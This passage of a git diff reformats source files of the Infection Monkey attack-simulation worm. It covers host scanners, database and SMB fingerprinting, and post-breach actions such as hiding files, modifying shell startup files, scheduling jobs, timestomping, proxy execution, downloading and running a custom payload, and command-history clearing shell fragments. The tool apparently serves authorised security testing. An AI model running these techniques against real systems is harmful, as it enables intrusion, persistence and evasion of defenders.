& 0xffffffff, - socket.htonl(int(msk, 16)) & 0xffffffff, - socket.inet_ntoa(struct.pack("I", int(gw, 16))), - iff, ifaddr)) + routes.append( + ( + socket.htonl(int(dst, 16)) & 0xFFFFFFFF, + socket.htonl(int(msk, 16)) & 0xFFFFFFFF, + socket.inet_ntoa(struct.pack("I", int(gw, 16))), + iff, + ifaddr, + ) + ) f.close() return routes @@ 
-142,23 +151,27 @@ def get_interfaces_ranges(): res = [] ifs = get_host_subnets() for net_interface in ifs: - address_str = net_interface['addr'] - netmask_str = net_interface['netmask'] + address_str = net_interface["addr"] + netmask_str = net_interface["netmask"] # limit subnet scans to class C only res.append(CidrRange(cidr_range="%s/%s" % (address_str, netmask_str))) return res if is_windows_os(): + def get_ip_for_connection(target_ip): return None + + else: + def get_ip_for_connection(target_ip): try: - query_str = 'ip route get %s' % target_ip + query_str = "ip route get %s" % target_ip resp = check_output(query_str.split()) substr = resp.split() - src = substr[substr.index('src') + 1] + src = substr[substr.index("src") + 1] return src except Exception: return None diff --git a/monkey/infection_monkey/network/mssql_fingerprint.py b/monkey/infection_monkey/network/mssql_fingerprint.py index 8d934677e..3113d278f 100644 --- a/monkey/infection_monkey/network/mssql_fingerprint.py +++ b/monkey/infection_monkey/network/mssql_fingerprint.py @@ -5,7 +5,7 @@ import socket import infection_monkey.config from infection_monkey.network.HostFinger import HostFinger -__author__ = 'Maor Rayzin' +__author__ = "Maor Rayzin" LOG = logging.getLogger(__name__) @@ -15,19 +15,19 @@ class MSSQLFinger(HostFinger): SQL_BROWSER_DEFAULT_PORT = 1434 BUFFER_SIZE = 4096 TIMEOUT = 5 - _SCANNED_SERVICE = 'MSSQL' + _SCANNED_SERVICE = "MSSQL" def __init__(self): self._config = infection_monkey.config.WormConfiguration def get_host_fingerprint(self, host): """Gets Microsoft SQL Server instance information by querying the SQL Browser service. - :arg: - host (VictimHost): The MS-SSQL Server to query for information. + :arg: + host (VictimHost): The MS-SSQL Server to query for information. - :returns: - Discovered server information written to the Host info struct. - True if success, False otherwise. + :returns: + Discovered server information written to the Host info struct. + True if success, False otherwise. """ # Create a UDP socket and sets a timeout @@ -37,43 +37,56 @@ class MSSQLFinger(HostFinger): # The message is a CLNT_UCAST_EX packet to get all instances # https://msdn.microsoft.com/en-us/library/cc219745.aspx - message = '\x03' + message = "\x03" # Encode the message as a bytesarray message = message.encode() # send data and receive response try: - LOG.info('Sending message to requested host: {0}, {1}'.format(host, message)) + LOG.info("Sending message to requested host: {0}, {1}".format(host, message)) sock.sendto(message, server_address) data, server = sock.recvfrom(self.BUFFER_SIZE) except socket.timeout: - LOG.info('Socket timeout reached, maybe browser service on host: {0} doesnt exist'.format(host)) + LOG.info( + "Socket timeout reached, maybe browser service on host: {0} doesnt exist".format( + host + ) + ) sock.close() return False except socket.error as e: if e.errno == errno.ECONNRESET: - LOG.info('Connection was forcibly closed by the remote host. The host: {0} is rejecting the packet.' - .format(host)) + LOG.info( + "Connection was forcibly closed by the remote host. 
The host: {0} is rejecting the packet.".format( + host + ) + ) else: - LOG.error('An unknown socket error occurred while trying the mssql fingerprint, closing socket.', - exc_info=True) + LOG.error( + "An unknown socket error occurred while trying the mssql fingerprint, closing socket.", + exc_info=True, + ) sock.close() return False - self.init_service(host.services, self._SCANNED_SERVICE, MSSQLFinger.SQL_BROWSER_DEFAULT_PORT) + self.init_service( + host.services, self._SCANNED_SERVICE, MSSQLFinger.SQL_BROWSER_DEFAULT_PORT + ) # Loop through the server data - instances_list = data[3:].decode().split(';;') - LOG.info('{0} MSSQL instances found'.format(len(instances_list))) + instances_list = data[3:].decode().split(";;") + LOG.info("{0} MSSQL instances found".format(len(instances_list))) for instance in instances_list: - instance_info = instance.split(';') + instance_info = instance.split(";") if len(instance_info) > 1: host.services[self._SCANNED_SERVICE][instance_info[1]] = {} for i in range(1, len(instance_info), 2): # Each instance's info is nested under its own name, if there are multiple instances # each will appear under its own name - host.services[self._SCANNED_SERVICE][instance_info[1]][instance_info[i - 1]] = instance_info[i] + host.services[self._SCANNED_SERVICE][instance_info[1]][ + instance_info[i - 1] + ] = instance_info[i] # Close the socket sock.close() diff --git a/monkey/infection_monkey/network/mysqlfinger.py b/monkey/infection_monkey/network/mysqlfinger.py index 968e5361f..c04814c9f 100644 --- a/monkey/infection_monkey/network/mysqlfinger.py +++ b/monkey/infection_monkey/network/mysqlfinger.py @@ -6,15 +6,16 @@ from infection_monkey.network.HostFinger import HostFinger from infection_monkey.network.tools import struct_unpack_tracker, struct_unpack_tracker_string MYSQL_PORT = 3306 -SQL_SERVICE = 'mysqld-3306' +SQL_SERVICE = "mysqld-3306" LOG = logging.getLogger(__name__) class MySQLFinger(HostFinger): """ - Fingerprints mysql databases, only on port 3306 + Fingerprints mysql databases, only on port 3306 """ - _SCANNED_SERVICE = 'MySQL' + + _SCANNED_SERVICE = "MySQL" SOCKET_TIMEOUT = 0.5 HEADER_SIZE = 4 # in bytes @@ -36,7 +37,7 @@ class MySQLFinger(HostFinger): response, curpos = struct_unpack_tracker(header, 0, "I") response = response[0] - response_length = response & 0xff # first byte is significant + response_length = response & 0xFF # first byte is significant data = s.recv(response_length) # now we can start parsing protocol, curpos = struct_unpack_tracker(data, 0, "B") @@ -47,14 +48,16 @@ class MySQLFinger(HostFinger): LOG.debug("Mysql server returned error") return False - version, curpos = struct_unpack_tracker_string(data, curpos) # special coded to solve string parsing + version, curpos = struct_unpack_tracker_string( + data, curpos + ) # special coded to solve string parsing version = version[0].decode() self.init_service(host.services, SQL_SERVICE, MYSQL_PORT) - host.services[SQL_SERVICE]['version'] = version - version = version.split('-')[0].split('.') - host.services[SQL_SERVICE]['major_version'] = version[0] - host.services[SQL_SERVICE]['minor_version'] = version[1] - host.services[SQL_SERVICE]['build_version'] = version[2] + host.services[SQL_SERVICE]["version"] = version + version = version.split("-")[0].split(".") + host.services[SQL_SERVICE]["major_version"] = version[0] + host.services[SQL_SERVICE]["minor_version"] = version[1] + host.services[SQL_SERVICE]["build_version"] = version[2] thread_id, curpos = struct_unpack_tracker(data, curpos, " 1: for 
subnet_str in WormConfiguration.inaccessible_subnets: - if NetworkScanner._is_any_ip_in_subnet([str(x) for x in self._ip_addresses], subnet_str): + if NetworkScanner._is_any_ip_in_subnet( + [str(x) for x in self._ip_addresses], subnet_str + ): # If machine has IPs from 2 different subnets in the same group, there's no point checking the other # subnet. for other_subnet_str in WormConfiguration.inaccessible_subnets: if other_subnet_str == subnet_str: continue - if not NetworkScanner._is_any_ip_in_subnet([str(x) for x in self._ip_addresses], - other_subnet_str): + if not NetworkScanner._is_any_ip_in_subnet( + [str(x) for x in self._ip_addresses], other_subnet_str + ): subnets_to_scan.append(NetworkRange.get_range_obj(other_subnet_str)) break @@ -74,7 +79,9 @@ class NetworkScanner(object): # Because we are using this to spread out IO heavy tasks, we can probably go a lot higher than CPU core size # But again, balance pool = Pool(ITERATION_BLOCK_SIZE) - victim_generator = VictimHostGenerator(self._ranges, WormConfiguration.blocked_ips, local_ips()) + victim_generator = VictimHostGenerator( + self._ranges, WormConfiguration.blocked_ips, local_ips() + ) victims_count = 0 for victim_chunk in victim_generator.generate_victims(ITERATION_BLOCK_SIZE): diff --git a/monkey/infection_monkey/network/ping_scanner.py b/monkey/infection_monkey/network/ping_scanner.py index fd19550a3..dd1577e47 100644 --- a/monkey/infection_monkey/network/ping_scanner.py +++ b/monkey/infection_monkey/network/ping_scanner.py @@ -8,11 +8,11 @@ import infection_monkey.config from infection_monkey.network.HostFinger import HostFinger from infection_monkey.network.HostScanner import HostScanner -__author__ = 'itamar' +__author__ = "itamar" PING_COUNT_FLAG = "-n" if "win32" == sys.platform else "-c" PING_TIMEOUT_FLAG = "-w" if "win32" == sys.platform else "-W" -TTL_REGEX_STR = r'(?<=TTL\=)[0-9]+' +TTL_REGEX_STR = r"(?<=TTL\=)[0-9]+" LINUX_TTL = 64 WINDOWS_TTL = 128 @@ -20,7 +20,7 @@ LOG = logging.getLogger(__name__) class PingScanner(HostScanner, HostFinger): - _SCANNED_SERVICE = '' + _SCANNED_SERVICE = "" def __init__(self): self._config = infection_monkey.config.WormConfiguration @@ -33,12 +33,11 @@ class PingScanner(HostScanner, HostFinger): if not "win32" == sys.platform: timeout /= 1000 - return 0 == subprocess.call(["ping", - PING_COUNT_FLAG, "1", - PING_TIMEOUT_FLAG, str(timeout), - host.ip_addr], - stdout=self._devnull, - stderr=self._devnull) + return 0 == subprocess.call( + ["ping", PING_COUNT_FLAG, "1", PING_TIMEOUT_FLAG, str(timeout), host.ip_addr], + stdout=self._devnull, + stderr=self._devnull, + ) def get_host_fingerprint(self, host): @@ -50,7 +49,7 @@ class PingScanner(HostScanner, HostFinger): ["ping", PING_COUNT_FLAG, "1", PING_TIMEOUT_FLAG, str(timeout), host.ip_addr], stdout=subprocess.PIPE, stderr=subprocess.PIPE, - text=True + text=True, ) output = " ".join(sub_proc.communicate()) @@ -59,9 +58,9 @@ class PingScanner(HostScanner, HostFinger): try: ttl = int(regex_result.group(0)) if ttl <= LINUX_TTL: - host.os['type'] = 'linux' + host.os["type"] = "linux" else: # as far we we know, could also be OSX/BSD but lets handle that when it comes up. 
- host.os['type'] = 'windows' + host.os["type"] = "windows" host.icmp = True diff --git a/monkey/infection_monkey/network/postgresql_finger.py b/monkey/infection_monkey/network/postgresql_finger.py index 031765dd8..16f6327f9 100644 --- a/monkey/infection_monkey/network/postgresql_finger.py +++ b/monkey/infection_monkey/network/postgresql_finger.py @@ -48,9 +48,7 @@ class PostgreSQLFinger(HostFinger): # if it comes here, the creds worked # this shouldn't happen since capital letters are not supported in postgres usernames # perhaps the service is a honeypot - self.init_service( - host.services, self._SCANNED_SERVICE, self.POSTGRESQL_DEFAULT_PORT - ) + self.init_service(host.services, self._SCANNED_SERVICE, self.POSTGRESQL_DEFAULT_PORT) host.services[self._SCANNED_SERVICE]["communication_encryption_details"] = ( "The PostgreSQL server was unexpectedly accessible with the credentials - " + f"user: '{self.CREDS['username']}' and password: '{self.CREDS['password']}'. Is this a honeypot?" @@ -75,18 +73,13 @@ class PostgreSQLFinger(HostFinger): return False def _is_relevant_exception(self, exception_string): - if not any( - substr in exception_string - for substr in self.RELEVANT_EX_SUBSTRINGS.values() - ): + if not any(substr in exception_string for substr in self.RELEVANT_EX_SUBSTRINGS.values()): # OperationalError due to some other reason - irrelevant exception return False return True def analyze_operational_error(self, host, exception_string): - self.init_service( - host.services, self._SCANNED_SERVICE, self.POSTGRESQL_DEFAULT_PORT - ) + self.init_service(host.services, self._SCANNED_SERVICE, self.POSTGRESQL_DEFAULT_PORT) exceptions = exception_string.split("\n") @@ -98,17 +91,15 @@ class PostgreSQLFinger(HostFinger): else: # SSL not configured self.get_connection_details_ssl_not_configured(exceptions) - host.services[self._SCANNED_SERVICE][ - "communication_encryption_details" - ] = "".join(self.ssl_connection_details) + host.services[self._SCANNED_SERVICE]["communication_encryption_details"] = "".join( + self.ssl_connection_details + ) @staticmethod def is_ssl_configured(exceptions): # when trying to authenticate, it checks pg_hba.conf file: # first, for a record where it can connect with SSL and second, without SSL - if ( - len(exceptions) == 1 - ): # SSL not configured on server so only checks for non-SSL record + if len(exceptions) == 1: # SSL not configured on server so only checks for non-SSL record return False elif len(exceptions) == 2: # SSL configured so checks for both return True @@ -131,22 +122,16 @@ class PostgreSQLFinger(HostFinger): if ( ssl_selected_comms_only ): # if only selected SSL allowed and only selected non-SSL allowed - self.ssl_connection_details[-1] = self.CONNECTION_DETAILS[ - "only_selected" - ] + self.ssl_connection_details[-1] = self.CONNECTION_DETAILS["only_selected"] else: - self.ssl_connection_details.append( - self.CONNECTION_DETAILS["selected_non_ssl"] - ) + self.ssl_connection_details.append(self.CONNECTION_DETAILS["selected_non_ssl"]) def get_connection_details_ssl_not_configured(self, exceptions): self.ssl_connection_details.append(self.CONNECTION_DETAILS["ssl_not_conf"]) if self.found_entry_for_host_but_pwd_auth_failed(exceptions[0]): self.ssl_connection_details.append(self.CONNECTION_DETAILS["all_non_ssl"]) else: - self.ssl_connection_details.append( - self.CONNECTION_DETAILS["selected_non_ssl"] - ) + self.ssl_connection_details.append(self.CONNECTION_DETAILS["selected_non_ssl"]) @staticmethod def found_entry_for_host_but_pwd_auth_failed(exception): 
diff --git a/monkey/infection_monkey/network/smbfinger.py b/monkey/infection_monkey/network/smbfinger.py index f822822da..457d0213d 100644 --- a/monkey/infection_monkey/network/smbfinger.py +++ b/monkey/infection_monkey/network/smbfinger.py @@ -7,15 +7,17 @@ from odict import odict from infection_monkey.network.HostFinger import HostFinger SMB_PORT = 445 -SMB_SERVICE = 'tcp-445' +SMB_SERVICE = "tcp-445" LOG = logging.getLogger(__name__) class Packet: - fields = odict([ - ("data", ""), - ]) + fields = odict( + [ + ("data", ""), + ] + ) def __init__(self, **kw): self.fields = odict(self.__class__.fields) @@ -26,91 +28,103 @@ class Packet: self.fields[k] = v def to_byte_string(self): - content_list = [(x.to_byte_string() if hasattr(x, "to_byte_string") else x) for x in self.fields.values()] + content_list = [ + (x.to_byte_string() if hasattr(x, "to_byte_string") else x) + for x in self.fields.values() + ] return b"".join(content_list) # SMB Packets class SMBHeader(Packet): - fields = odict([ - ("proto", b"\xff\x53\x4d\x42"), - ("cmd", b"\x72"), - ("errorcode", b"\x00\x00\x00\x00"), - ("flag1", b"\x00"), - ("flag2", b"\x00\x00"), - ("pidhigh", b"\x00\x00"), - ("signature", b"\x00\x00\x00\x00\x00\x00\x00\x00"), - ("reserved", b"\x00\x00"), - ("tid", b"\x00\x00"), - ("pid", b"\x00\x00"), - ("uid", b"\x00\x00"), - ("mid", b"\x00\x00"), - ]) + fields = odict( + [ + ("proto", b"\xff\x53\x4d\x42"), + ("cmd", b"\x72"), + ("errorcode", b"\x00\x00\x00\x00"), + ("flag1", b"\x00"), + ("flag2", b"\x00\x00"), + ("pidhigh", b"\x00\x00"), + ("signature", b"\x00\x00\x00\x00\x00\x00\x00\x00"), + ("reserved", b"\x00\x00"), + ("tid", b"\x00\x00"), + ("pid", b"\x00\x00"), + ("uid", b"\x00\x00"), + ("mid", b"\x00\x00"), + ] + ) class SMBNego(Packet): - fields = odict([ - ("wordcount", b"\x00"), - ("bcc", b"\x62\x00"), - ("data", "") - ]) + fields = odict([("wordcount", b"\x00"), ("bcc", b"\x62\x00"), ("data", "")]) def calculate(self): self.fields["bcc"] = struct.pack(" 0. false || true -> 0. false || false -> 1. So: # if curl works, we're good. @@ -69,12 +78,19 @@ class CommunicateAsNewUser(PBA): :param username: Username from which the command was executed, for reporting back. 
""" if exit_status == 0: - PostBreachTelem(self, ( - CREATED_PROCESS_AS_USER_SUCCESS_FORMAT.format(commandline, username), True)).send() + PostBreachTelem( + self, (CREATED_PROCESS_AS_USER_SUCCESS_FORMAT.format(commandline, username), True) + ).send() else: - PostBreachTelem(self, ( - CREATED_PROCESS_AS_USER_FAILED_FORMAT.format( - commandline, username, exit_status, twos_complement(exit_status)), False)).send() + PostBreachTelem( + self, + ( + CREATED_PROCESS_AS_USER_FAILED_FORMAT.format( + commandline, username, exit_status, twos_complement(exit_status) + ), + False, + ), + ).send() def twos_complement(exit_status): diff --git a/monkey/infection_monkey/post_breach/actions/discover_accounts.py b/monkey/infection_monkey/post_breach/actions/discover_accounts.py index 4d6e5f87d..8fdebd0df 100644 --- a/monkey/infection_monkey/post_breach/actions/discover_accounts.py +++ b/monkey/infection_monkey/post_breach/actions/discover_accounts.py @@ -1,11 +1,13 @@ from common.common_consts.post_breach_consts import POST_BREACH_ACCOUNT_DISCOVERY -from infection_monkey.post_breach.account_discovery.account_discovery import get_commands_to_discover_accounts +from infection_monkey.post_breach.account_discovery.account_discovery import ( + get_commands_to_discover_accounts, +) from infection_monkey.post_breach.pba import PBA class AccountDiscovery(PBA): def __init__(self): linux_cmds, windows_cmds = get_commands_to_discover_accounts() - super().__init__(POST_BREACH_ACCOUNT_DISCOVERY, - linux_cmd=' '.join(linux_cmds), - windows_cmd=windows_cmds) + super().__init__( + POST_BREACH_ACCOUNT_DISCOVERY, linux_cmd=" ".join(linux_cmds), windows_cmd=windows_cmds + ) diff --git a/monkey/infection_monkey/post_breach/actions/hide_files.py b/monkey/infection_monkey/post_breach/actions/hide_files.py index baba3afea..c6e1d1a6b 100644 --- a/monkey/infection_monkey/post_breach/actions/hide_files.py +++ b/monkey/infection_monkey/post_breach/actions/hide_files.py @@ -2,12 +2,14 @@ from common.common_consts.post_breach_consts import POST_BREACH_HIDDEN_FILES from infection_monkey.post_breach.pba import PBA from infection_monkey.telemetry.post_breach_telem import PostBreachTelem from infection_monkey.utils.environment import is_windows_os -from infection_monkey.utils.hidden_files import (cleanup_hidden_files, get_commands_to_hide_files, - get_commands_to_hide_folders) +from infection_monkey.utils.hidden_files import ( + cleanup_hidden_files, + get_commands_to_hide_files, + get_commands_to_hide_folders, +) from infection_monkey.utils.windows.hidden_files import get_winAPI_to_hide_files -HIDDEN_FSO_CREATION_COMMANDS = [get_commands_to_hide_files, - get_commands_to_hide_folders] +HIDDEN_FSO_CREATION_COMMANDS = [get_commands_to_hide_files, get_commands_to_hide_folders] class HiddenFiles(PBA): @@ -22,9 +24,11 @@ class HiddenFiles(PBA): # create hidden files and folders for function_to_get_commands in HIDDEN_FSO_CREATION_COMMANDS: linux_cmds, windows_cmds = function_to_get_commands() - super(HiddenFiles, self).__init__(name=POST_BREACH_HIDDEN_FILES, - linux_cmd=' '.join(linux_cmds), - windows_cmd=windows_cmds) + super(HiddenFiles, self).__init__( + name=POST_BREACH_HIDDEN_FILES, + linux_cmd=" ".join(linux_cmds), + windows_cmd=windows_cmds, + ) super(HiddenFiles, self).run() if is_windows_os(): # use winAPI result, status = get_winAPI_to_hide_files() diff --git a/monkey/infection_monkey/post_breach/actions/modify_shell_startup_files.py b/monkey/infection_monkey/post_breach/actions/modify_shell_startup_files.py index c10575d39..eea61ed2f 
100644 --- a/monkey/infection_monkey/post_breach/actions/modify_shell_startup_files.py +++ b/monkey/infection_monkey/post_breach/actions/modify_shell_startup_files.py @@ -2,8 +2,9 @@ import subprocess from common.common_consts.post_breach_consts import POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION from infection_monkey.post_breach.pba import PBA -from infection_monkey.post_breach.shell_startup_files.shell_startup_files_modification import \ - get_commands_to_modify_shell_startup_files +from infection_monkey.post_breach.shell_startup_files.shell_startup_files_modification import ( + get_commands_to_modify_shell_startup_files, +) from infection_monkey.telemetry.post_breach_telem import PostBreachTelem @@ -24,37 +25,42 @@ class ModifyShellStartupFiles(PBA): def modify_shell_startup_PBA_list(self): return self.ShellStartupPBAGenerator().get_modify_shell_startup_pbas() - class ShellStartupPBAGenerator(): + class ShellStartupPBAGenerator: def get_modify_shell_startup_pbas(self): - (cmds_for_linux, shell_startup_files_for_linux, usernames_for_linux),\ - (cmds_for_windows, shell_startup_files_per_user_for_windows) =\ - get_commands_to_modify_shell_startup_files() + (cmds_for_linux, shell_startup_files_for_linux, usernames_for_linux), ( + cmds_for_windows, + shell_startup_files_per_user_for_windows, + ) = get_commands_to_modify_shell_startup_files() pbas = [] for startup_file_per_user in shell_startup_files_per_user_for_windows: - windows_cmds = ' '.join(cmds_for_windows).format(startup_file_per_user) - pbas.append(self.ModifyShellStartupFile(linux_cmds='', windows_cmds=windows_cmds)) + windows_cmds = " ".join(cmds_for_windows).format(startup_file_per_user) + pbas.append(self.ModifyShellStartupFile(linux_cmds="", windows_cmds=windows_cmds)) for username in usernames_for_linux: for shell_startup_file in shell_startup_files_for_linux: - linux_cmds = ' '.join(cmds_for_linux).format(shell_startup_file).format(username) - pbas.append(self.ModifyShellStartupFile(linux_cmds=linux_cmds, windows_cmds='')) + linux_cmds = ( + " ".join(cmds_for_linux).format(shell_startup_file).format(username) + ) + pbas.append(self.ModifyShellStartupFile(linux_cmds=linux_cmds, windows_cmds="")) return pbas class ModifyShellStartupFile(PBA): def __init__(self, linux_cmds, windows_cmds): - super().__init__(name=POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION, - linux_cmd=linux_cmds, - windows_cmd=windows_cmds) + super().__init__( + name=POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION, + linux_cmd=linux_cmds, + windows_cmd=windows_cmds, + ) def run(self): if self.command: try: - output = subprocess.check_output(self.command, # noqa: DUO116 - stderr=subprocess.STDOUT, - shell=True).decode() + output = subprocess.check_output( + self.command, stderr=subprocess.STDOUT, shell=True # noqa: DUO116 + ).decode() return output, True except subprocess.CalledProcessError as e: # Return error output of the command diff --git a/monkey/infection_monkey/post_breach/actions/schedule_jobs.py b/monkey/infection_monkey/post_breach/actions/schedule_jobs.py index fda4a7379..e7845968a 100644 --- a/monkey/infection_monkey/post_breach/actions/schedule_jobs.py +++ b/monkey/infection_monkey/post_breach/actions/schedule_jobs.py @@ -1,6 +1,8 @@ from common.common_consts.post_breach_consts import POST_BREACH_JOB_SCHEDULING -from infection_monkey.post_breach.job_scheduling.job_scheduling import (get_commands_to_schedule_jobs, - remove_scheduled_jobs) +from infection_monkey.post_breach.job_scheduling.job_scheduling import ( + get_commands_to_schedule_jobs, + 
remove_scheduled_jobs, +) from infection_monkey.post_breach.pba import PBA @@ -12,9 +14,11 @@ class ScheduleJobs(PBA): def __init__(self): linux_cmds, windows_cmds = get_commands_to_schedule_jobs() - super(ScheduleJobs, self).__init__(name=POST_BREACH_JOB_SCHEDULING, - linux_cmd=' '.join(linux_cmds), - windows_cmd=windows_cmds) + super(ScheduleJobs, self).__init__( + name=POST_BREACH_JOB_SCHEDULING, + linux_cmd=" ".join(linux_cmds), + windows_cmd=windows_cmds, + ) def run(self): super(ScheduleJobs, self).run() diff --git a/monkey/infection_monkey/post_breach/actions/timestomping.py b/monkey/infection_monkey/post_breach/actions/timestomping.py index bf02664eb..ece987107 100644 --- a/monkey/infection_monkey/post_breach/actions/timestomping.py +++ b/monkey/infection_monkey/post_breach/actions/timestomping.py @@ -6,6 +6,4 @@ from infection_monkey.post_breach.timestomping.timestomping import get_timestomp class Timestomping(PBA): def __init__(self): linux_cmds, windows_cmds = get_timestomping_commands() - super().__init__(POST_BREACH_TIMESTOMPING, - linux_cmd=linux_cmds, - windows_cmd=windows_cmds) + super().__init__(POST_BREACH_TIMESTOMPING, linux_cmd=linux_cmds, windows_cmd=windows_cmds) diff --git a/monkey/infection_monkey/post_breach/actions/use_signed_scripts.py b/monkey/infection_monkey/post_breach/actions/use_signed_scripts.py index ed9f665f0..555de4667 100644 --- a/monkey/infection_monkey/post_breach/actions/use_signed_scripts.py +++ b/monkey/infection_monkey/post_breach/actions/use_signed_scripts.py @@ -4,7 +4,9 @@ import subprocess from common.common_consts.post_breach_consts import POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC from infection_monkey.post_breach.pba import PBA from infection_monkey.post_breach.signed_script_proxy.signed_script_proxy import ( - cleanup_changes, get_commands_to_proxy_execution_using_signed_script) + cleanup_changes, + get_commands_to_proxy_execution_using_signed_script, +) from infection_monkey.utils.environment import is_windows_os LOG = logging.getLogger(__name__) @@ -13,18 +15,20 @@ LOG = logging.getLogger(__name__) class SignedScriptProxyExecution(PBA): def __init__(self): windows_cmds = get_commands_to_proxy_execution_using_signed_script() - super().__init__(POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC, - windows_cmd=' '.join(windows_cmds)) + super().__init__(POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC, windows_cmd=" ".join(windows_cmds)) def run(self): try: - original_comspec = '' + original_comspec = "" if is_windows_os(): - original_comspec =\ - subprocess.check_output('if defined COMSPEC echo %COMSPEC%', shell=True).decode() # noqa: DUO116 + original_comspec = subprocess.check_output( + "if defined COMSPEC echo %COMSPEC%", shell=True + ).decode() # noqa: DUO116 super().run() except Exception as e: - LOG.warning(f"An exception occurred on running PBA {POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC}: {str(e)}") + LOG.warning( + f"An exception occurred on running PBA {POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC}: {str(e)}" + ) finally: cleanup_changes(original_comspec) diff --git a/monkey/infection_monkey/post_breach/actions/use_trap_command.py b/monkey/infection_monkey/post_breach/actions/use_trap_command.py index 7afd2e631..9f6afc829 100644 --- a/monkey/infection_monkey/post_breach/actions/use_trap_command.py +++ b/monkey/infection_monkey/post_breach/actions/use_trap_command.py @@ -6,5 +6,4 @@ from infection_monkey.post_breach.trap_command.trap_command import get_trap_comm class TrapCommand(PBA): def __init__(self): linux_cmds = get_trap_commands() - super(TrapCommand, 
self).__init__(POST_BREACH_TRAP_COMMAND, - linux_cmd=linux_cmds) + super(TrapCommand, self).__init__(POST_BREACH_TRAP_COMMAND, linux_cmd=linux_cmds) diff --git a/monkey/infection_monkey/post_breach/actions/users_custom_pba.py b/monkey/infection_monkey/post_breach/actions/users_custom_pba.py index dd723c14d..5ecae1b5e 100644 --- a/monkey/infection_monkey/post_breach/actions/users_custom_pba.py +++ b/monkey/infection_monkey/post_breach/actions/users_custom_pba.py @@ -13,10 +13,10 @@ from infection_monkey.utils.monkey_dir import get_monkey_dir_path LOG = logging.getLogger(__name__) -__author__ = 'VakarisZ' +__author__ = "VakarisZ" -DIR_CHANGE_WINDOWS = 'cd %s & ' -DIR_CHANGE_LINUX = 'cd %s ; ' +DIR_CHANGE_WINDOWS = "cd %s & " +DIR_CHANGE_LINUX = "cd %s ; " class UsersPBA(PBA): @@ -26,7 +26,7 @@ class UsersPBA(PBA): def __init__(self): super(UsersPBA, self).__init__(POST_BREACH_FILE_EXECUTION) - self.filename = '' + self.filename = "" if not is_windows_os(): # Add linux commands to PBA's @@ -34,7 +34,9 @@ class UsersPBA(PBA): self.filename = WormConfiguration.PBA_linux_filename if WormConfiguration.custom_PBA_linux_cmd: # Add change dir command, because user will try to access his file - self.command = (DIR_CHANGE_LINUX % get_monkey_dir_path()) + WormConfiguration.custom_PBA_linux_cmd + self.command = ( + DIR_CHANGE_LINUX % get_monkey_dir_path() + ) + WormConfiguration.custom_PBA_linux_cmd elif WormConfiguration.custom_PBA_linux_cmd: self.command = WormConfiguration.custom_PBA_linux_cmd else: @@ -43,7 +45,9 @@ class UsersPBA(PBA): self.filename = WormConfiguration.PBA_windows_filename if WormConfiguration.custom_PBA_windows_cmd: # Add change dir command, because user will try to access his file - self.command = (DIR_CHANGE_WINDOWS % get_monkey_dir_path()) + WormConfiguration.custom_PBA_windows_cmd + self.command = ( + DIR_CHANGE_WINDOWS % get_monkey_dir_path() + ) + WormConfiguration.custom_PBA_windows_cmd elif WormConfiguration.custom_PBA_windows_cmd: self.command = WormConfiguration.custom_PBA_windows_cmd @@ -81,16 +85,18 @@ class UsersPBA(PBA): if not status: status = ScanStatus.USED - T1105Telem(status, - WormConfiguration.current_server.split(':')[0], - get_interface_to_target(WormConfiguration.current_server.split(':')[0]), - filename).send() + T1105Telem( + status, + WormConfiguration.current_server.split(":")[0], + get_interface_to_target(WormConfiguration.current_server.split(":")[0]), + filename, + ).send() if status == ScanStatus.SCANNED: return False try: - with open(os.path.join(dst_dir, filename), 'wb') as written_PBA_file: + with open(os.path.join(dst_dir, filename), "wb") as written_PBA_file: written_PBA_file.write(pba_file_contents.content) return True except IOError as e: diff --git a/monkey/infection_monkey/post_breach/clear_command_history/clear_command_history.py b/monkey/infection_monkey/post_breach/clear_command_history/clear_command_history.py index a5e8d7d44..fab63095e 100644 --- a/monkey/infection_monkey/post_breach/clear_command_history/clear_command_history.py +++ b/monkey/infection_monkey/post_breach/clear_command_history/clear_command_history.py @@ -1,11 +1,14 @@ from infection_monkey.post_breach.clear_command_history.linux_clear_command_history import ( - get_linux_command_history_files, get_linux_commands_to_clear_command_history, get_linux_usernames) + get_linux_command_history_files, + get_linux_commands_to_clear_command_history, + get_linux_usernames, +) def get_commands_to_clear_command_history(): - (linux_cmds, - linux_cmd_hist_files, - linux_usernames) = 
(get_linux_commands_to_clear_command_history(), - get_linux_command_history_files(), - get_linux_usernames()) + (linux_cmds, linux_cmd_hist_files, linux_usernames) = ( + get_linux_commands_to_clear_command_history(), + get_linux_command_history_files(), + get_linux_usernames(), + ) return linux_cmds, linux_cmd_hist_files, linux_usernames diff --git a/monkey/infection_monkey/post_breach/clear_command_history/linux_clear_command_history.py b/monkey/infection_monkey/post_breach/clear_command_history/linux_clear_command_history.py index a3545f124..642a42d5a 100644 --- a/monkey/infection_monkey/post_breach/clear_command_history/linux_clear_command_history.py +++ b/monkey/infection_monkey/post_breach/clear_command_history/linux_clear_command_history.py @@ -5,19 +5,18 @@ from infection_monkey.utils.environment import is_windows_os def get_linux_commands_to_clear_command_history(): if is_windows_os(): - return '' + return "" - TEMP_HIST_FILE = '$HOME/monkey-temp-hist-file' + TEMP_HIST_FILE = "$HOME/monkey-temp-hist-file" return [ - '3<{0} 3<&- && ', # check for existence of file - 'cat {0} ' # copy contents of history file to... - f'> {TEMP_HIST_FILE} && ', # ...temporary file - 'echo > {0} && ', # clear contents of file - 'echo \"Successfully cleared {0}\" && ', # if successfully cleared - f'cat {TEMP_HIST_FILE} ', # restore history file back with... - '> {0} ;' # ...original contents - f'rm {TEMP_HIST_FILE} -f' # remove temp history file + "3<{0} 3<&- && ", # check for existence of file + "cat {0} " # copy contents of history file to... + f"> {TEMP_HIST_FILE} && ", # ...temporary file + "echo > {0} && ", # clear contents of file + 'echo "Successfully cleared {0}" && ', # if successfully cleared + f"cat {TEMP_HIST_FILE} ", # restore history file back with... 
